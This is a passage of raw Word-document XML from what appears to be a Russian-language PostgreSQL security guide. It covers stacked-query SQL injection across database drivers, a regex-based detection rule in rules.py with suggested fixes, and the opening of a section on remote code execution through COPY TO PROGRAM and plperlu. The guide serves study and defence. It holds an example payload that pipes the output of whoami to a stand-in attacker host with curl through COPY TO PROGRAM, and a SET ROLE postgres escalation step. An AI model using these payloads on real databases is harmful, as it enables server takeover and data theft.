            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">QueryExecModeCacheStatement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Node.js + pg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client.query(sql, [values])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$1</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через extended protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Общее правило: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значение пользовательского ввода должно прийти на сервер как отдельный Bind-параметр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не как часть SQL-текста. Конкатенация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f-string, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Sprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, template literal) — анти-паттерн для всех стеков.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса MULTI_STATEMENT_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный набор паттернов по 6 драйверам:</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MULTI_STATEMENT_INJECTION = "multi_statement_injection"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VulnerabilityClass.MULTI_STATEMENT_INJECTION: 9,</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"stacked_python": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(?:cursor|cur|conn)\.(?:execute|fetch|fetchrow|fetchval)\s*\(\s*"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:f[\"']|[\"'][^\"']*[\"']\s*(?:\+|%\s*\w+|\.format))",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"stacked_java": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:createStatement\(\)\.execute|Statement\s+\w+\s*=.*createStatement)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"|preferQueryMode\s*=\s*simple",</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"stacked_go": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\.(?:Query|QueryRow|Exec)\(\s*\w+\s*,\s*"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:\"[^\"]*\"\s*\+|fmt\.Sprintf\()"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"|QueryExecModeSimpleProtocol",</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"stacked_node": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:client|pool)\.query\s*\(\s*[`\"'][^`\"']*(?:\$\{|'\s*\+)",</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for key in ("stacked_python", "stacked_java", "stacked_go", "stacked_node"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if _RE[key].search(sql_or_code):</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vulnerability_class=VulnerabilityClass.MULTI_STATEMENT_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            explanation="Вызов драйвера формирует SQL-строку конкатенацией "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "или использует API без параметризации — допускает "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "stacked queries через ; в пользовательском вводе.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            suggested_fix="Передавать значение как отдельный параметр "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "(%s/$1/? с setXxx или [values]); для динамических "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "identifiers — whitelist или специализированный "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "хелпер (psycopg.sql.SQL, pgx.Identifier, pg-format).",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break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk 9 (не 10) потому, что стакинг сам по себе — этап эскалации; конкретный урон зависит от того, что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-команде (DDL, GRANT, COPY PROGRAM — см. 3.7, 3.13).</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R20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Stacked queries по драйверам (sources/research.md, строки 319–349): libpq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PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, pgjdbc PreferQueryMode, asyncpg #30, pgx #1090/#1400, node-postgres #757/#1400, psycopg3 from_pg2.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Официальные доки драйверов:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> psycopg2 (passing parameters), psycopg3 (server-side parameters binding, from_pg2), asyncpg (Basic Usage), pgjdbc (Connecting + PreferQueryMode), pgx v5 (QueryExecMode), node-postgres (Queries + Parameterized query).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Дополнительно:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement</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PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Oracle JDBC tutorial), pg-format (datalanche/node-pg-format).</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 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернативный способ получить side-effect одной командой, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH … AS (INSERT/UPDATE/DELETE)</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Работает даже в extended-режиме, обходит и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=extended</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QueryExecModeCacheStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Граница уже зафиксирована в conventions.md: 3.5 — несколько команд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3.10 — одна команда с WITH.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FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — типичная «вторая команда»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успешном стакинге. Чаще всего цель эскалации: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT ...; COPY (SELECT '') TO PROGRAM 'curl attacker.tld/$(whoami)'</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 SET ROLE / SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — «вторая команда» для смены текущей роли в той же сессии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Через стакинг application-роль может выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и продолжить уже как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параметризация значений не покрывает динамические identifiers (имена таблиц, колонок). Это отдельная угроза с независимой защитой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whitelist).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Влияние managed-провайдеров</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В отличие от 3.6 (где managed-PG структурно ограничивает векторы), для 3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">managed-провайдер не имеет значения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поведение определяется драйвером и кодом приложения, а не серверной конфигурацией. RDS, Cloud SQL и Supabase одинаково восприимчивы к stacked queries при уязвимом коде; защита целиком на стороне разработчика.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE в PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — исполнение произвольной OS-команды на сервере БД с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OS-пользователя `postgres`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или того unix-аккаунта, под которым запущен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postmaster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Все векторы в этой категории требуют, чтобы атакующий уже имел SQL-execution в сессии — то есть RCE здесь это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">финальная стадия</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после успешной инъекции (3.1–3.5) или после получения привилегий через другие механизмы (3.13). Сам механизм RCE — серверная фича PostgreSQL (COPY с PROGRAM, untrusted procedural languages), а не баг сервера; единственное исключение — CVE-2024-10979 в trusted plperl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Четыре пути к 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FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — серверная фича COPY, исполняет shell-команду через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">popen()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Самый прямой и быстрый путь, не требует CREATE FUNCTION, не оставляет artifact-функций в базе.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3.7.2a plperlu (untrusted Perl)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension позволяет CREATE FUNCTION с произвольным Perl-кодом, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">system()</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exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Только superuser может создать функцию.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3.7.2b CVE-2024-10979 в plperl (trusted Perl)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
